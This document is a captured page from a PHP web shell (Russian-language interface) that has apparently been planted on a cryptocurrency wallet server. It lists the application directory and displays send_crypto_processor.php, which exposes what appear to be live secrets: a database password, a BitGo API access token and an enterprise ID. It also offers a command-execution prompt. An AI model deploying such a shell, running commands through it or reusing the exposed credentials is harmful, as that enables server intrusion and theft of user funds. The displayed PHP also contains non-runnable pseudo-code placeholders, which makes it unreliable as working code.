PHP WebShell

Текущая директория: /var/www/bitcardoApp

.. (вверх)
[DIR] ..
[FILE] .bash_history
[DIR] .cache
[DIR] .gnupg
[FILE] .htaccess
[FILE] .lesshst
[DIR] Old folder
[DIR] adminer
[DIR] assets
[DIR] auth
[DIR] backyard
[FILE] bitgo_enterprise_status.php
[FILE] bitgo_generate_address.php
[DIR] chat
[FILE] check_tron_wallet_keys.php
[DIR] config
[FILE] create_primary.php
[FILE] create_primary_wallet.php
[FILE] create_primary_wallet_eth_usdt_erc20.php
[DIR] cron
[FILE] generate_sol_address.php
[DIR] health
[DIR] includes
[FILE] index.php
[DIR] keycards
[DIR] lib
[DIR] middleware
[DIR] models
[DIR] node_modules
[FILE] package-lock.json
[FILE] package.json
[FILE] save_keycard_and_print.php
[DIR] security
[FILE] send_crypto.php
[FILE] send_crypto_processor.php
[DIR] storage
[FILE] test_bitgo_ping.php
[FILE] tester.php
[DIR] tmp
[DIR] tools
[FILE] tron_key_checker.php
[FILE] tron_send_onefile.js
[FILE] upload_debug.log
[DIR] uploads
[DIR] user
[DIR] vendor
[DIR] webhooks

Просмотр файла: send_crypto_processor.php

<?php
// === Database Configuration ===
define('DB_HOST', 'localhost');
define('DB_USER', 'bitcardo_wallet');
define('DB_PASS', 'Allowme@2050?');
define('DB_NAME', 'bitcardo_wallet');

// === Connect to DB ===
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASS, DB_NAME);
if (!$conn) {
    die('Database connection failed: ' . mysqli_connect_error());
}

// === BitGo API Configuration ===
define('BITGO_ACCESS_TOKEN', 'v2x198765d1835237bc0185b86b4833a8660d4bd02ab75b396f341276a184cf1e9d');
define('BITGO_ENTERPRISE_ID', '6816dcc10aa7119c1ad94c489d0bd9fe');
define('BITGO_API_BASE_URL', 'http://127.0.0.1:3080/api/v2');


if(user submit form){
    
    // === Input ===
    $coin = strtolower(trim($_POST['coin']));
    $amount = $_POST['amount'];
    $recipient = $_POST['recipient'];

    function getBaseUnits($coin) {
        return [
            'tbtc' => 100000000,
            'teth' => 1000000000000000000,
            'tsol' => 1000000000,
            'usdc' => 1000000
        ][$coin] ?? 1;
    }

    $baseUnit = getBaseUnits($coin);
    $amountInBase = (int) round(floatval($amount) * $baseUnit);

    //find wallet locally
    if(wallet is local){

        
    }else{
        // === Load encryption key ===
        $key_base64 = getenv("CENTRAL_WALLET_KEY");
        $key = base64_decode($key_base64, true);
        if (!$key || strlen($key) !== 32) {
            die("? Missing or invalid encryption key.");
        }

        // === Get central wallet ===
        $stmt = $conn->prepare("SELECT * FROM cwallet WHERE coin = ? LIMIT 1");
        $stmt->bind_param("s", $coin);
        $stmt->execute();
        $result = $stmt->get_result();

        if ($row = $result->fetch_assoc()) {
            $encrypted_phrase = base64_decode($row['encrypted_phrase']);
            $iv = base64_decode($row['dynamic_iv']);

            if (strlen($iv) !== 16) {
                die("? Invalid IV length.");
            }

            $passphrase = openssl_decrypt($encrypted_phrase, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv);
            if (!$passphrase) {
                die("? Failed to decrypt passphrase.");
            }

            $wallet_id = $row['wallet_add_id'];
            $sender_address = $row['wallet_address'];

            // === Send payload ===
            $payload = [
                'address' => $recipient,
                'amount' => $amountInBase,
                'walletPassphrase' => $passphrase
            ];
            if ($coin === 'tsol') {
                $payload['type'] = 'transfer';
            }

            $url = BITGO_API_BASE_URL . "/$coin/wallet/$wallet_id/sendcoins";
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_HTTPHEADER => [
                    "Content-Type: application/json",
                    "Authorization: Bearer " . BITGO_ACCESS_TOKEN
                ],
                CURLOPT_POSTFIELDS => json_encode($payload)
            ]);

            $response = curl_exec($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);

            if (curl_errno($ch)) {
                echo "? cURL error: " . curl_error($ch);
            } elseif ($httpCode !== 200) {
                echo "? BitGo error ($httpCode):<br><pre>$response</pre>";
            } else {
                $data = json_decode($response, true);
                $txid = $data['txid'] ?? null;

                // === Record transaction ===
                $insert = $conn->prepare("
                    INSERT INTO transactions 
                    (coin, sender_address, receiver_address, amount, type, txid, confirmation, status, applied, created_at) 
                    VALUES (?, ?, ?, ?, 'send', ?, 0, 'pending', 0, NOW())
                ");
                $insert->bind_param("sssds", $coin, $sender_address, $recipient, $amount, $txid);
                $insert->execute();

                echo "? Transaction sent and recorded!<br><pre>$response</pre>";
            }

        } else {
            echo "? No central wallet found for coin: $coin";
        }
    }
}

?>

Выполнить команду

Для локальной разработки. Не используйте в интернете!